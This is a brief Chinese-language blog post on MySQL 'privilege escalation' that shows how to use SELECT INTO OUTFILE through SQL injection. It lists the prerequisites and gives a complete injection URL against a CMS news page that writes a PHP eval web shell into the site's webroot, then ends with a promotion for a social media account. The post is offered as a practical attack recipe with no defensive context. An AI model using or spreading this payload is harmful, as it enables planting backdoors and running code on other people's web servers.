Mysql提权实战
Mysql提权实战
into outfile
select * from table into outfile ‘/路径/文件名’
1.需要知道物理路径
2. magic_quotes_gpc()=off(phpinfo.php)
3.权限支持 写权限
http://192.168.1.105:800/510cms2/news.php?cid=&listid=&newsid=27 and 1=2 UNION SELECT 1,2,3,’<?php eval($POST[CMD])?>’ from 510_admin into outfile ‘C\wwwroot\510cms2\77.php’
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗